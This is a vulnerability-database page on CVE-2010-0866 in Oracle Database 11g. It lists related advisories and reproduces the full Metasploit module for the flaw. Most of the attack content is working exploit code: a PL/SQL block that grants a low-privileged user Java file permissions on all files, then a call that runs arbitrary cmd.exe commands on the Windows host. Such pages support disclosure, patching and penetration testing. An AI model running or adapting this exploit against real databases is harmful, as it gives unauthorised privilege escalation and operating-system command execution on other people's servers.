Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution

🗓️ 15 Mar 2010 16:34:46Reported by sid <[email protected]>Type

Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only)

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2010-0866	29 May 201815:50	–	circl
Check Point Advisories	Oracle Database DBMS_JVM_EXP_PERMS System Command Execution (CVE-2010-0866; CVE-2010-0867)	12 May 201000:00	–	checkpoint_advisories
Check Point Advisories	Oracle Database DBMS_JAVA.SET_OUTPUT_TO_JAVA Privilege Escalation (CVE-2010-0866; CVE-2010-0867)	13 May 201000:00	–	checkpoint_advisories
CVE	CVE-2010-0866	13 Apr 201022:00	–	cve
Cvelist	CVE-2010-0866	13 Apr 201022:00	–	cvelist
Metasploit	Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution	15 Mar 201016:34	–	metasploit
NVD	CVE-2010-0866	13 Apr 201022:30	–	nvd
Oracle	Oracle Critical Patch Update Advisory - April 2010	13 Apr 201000:00	–	oracle
Oracle	Security \| Oracle Critical Patch Update - April 2010	13 Apr 201000:00	–	oracle
Tenable Nessus	Oracle Database Multiple Vulnerabilities (April 2010 CPU)	26 Apr 201000:00	–	nessus

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution',
      'Description'    => %q{
        This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows
          any user with create session privilege to grant themselves java IO privileges.
        Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
      },
      'Author'         => [ 'sid[at]notsosecure.com' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-0866'],
          [ 'OSVDB', '62184'],
          [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
          [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
        ],
      'DisclosureDate' => '2010-02-01'))

    register_options(
      [
        OptString.new('CMD', [ false, 'CMD to execute.',  "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
      ])
  end

  def run
    return if not check_dependencies

    name = Rex::Text.rand_text_alpha(rand(10) + 1)


    package = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','"
    package << "<" << "<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
    os_code = "select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe /c  #{datastore['CMD']}')from dual"

    begin
      print_status("Attempting to grant JAVA IO Privileges")
      prepare_exec(package)
      print_status("Attempting to execute OS Code")
      prepare_exec(os_code)
    rescue => e
      print_error("Error: #{e.class} #{e}")
    end
  end
end

02 Oct 2020 20:00Current

6.9Medium risk

Vulners AI Score6.9

CVSS 26.5

EPSS0.59232

oracle db 11g dbms_jvm_exp_perms os code execution david litchfield windows metasploit 0 day cve-2010-0866 osvdb-62184